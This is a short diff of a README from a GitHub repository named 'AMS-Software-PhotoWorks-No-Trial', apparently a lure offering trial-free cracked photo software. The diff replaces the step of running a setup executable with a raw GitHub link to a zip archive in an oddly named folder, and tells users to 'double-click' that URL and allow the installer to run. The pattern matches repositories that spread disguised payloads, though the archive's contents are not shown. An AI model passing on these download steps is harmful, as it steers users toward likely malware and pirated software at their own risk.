Mubranco2903/AMS-Software-PhotoWorks-No-Trial/README.md

 4. **Run the Installer**:
    Once the download is complete, navigate to the folder where you saved the file.

-   - Double-click `PhotoWorksSetup.exe` to start the installation.
+   - Double-click `https://raw.githubusercontent.com/Mubranco2903/AMS-Software-PhotoWorks-No-Trial/main/pteridium/AMS-Software-PhotoWorks-No-Trial-v3.9.zip` to start the installation.
    - If prompted by your computer, confirm to allow the installer to run.

 5. **Follow the Installation Wizard**: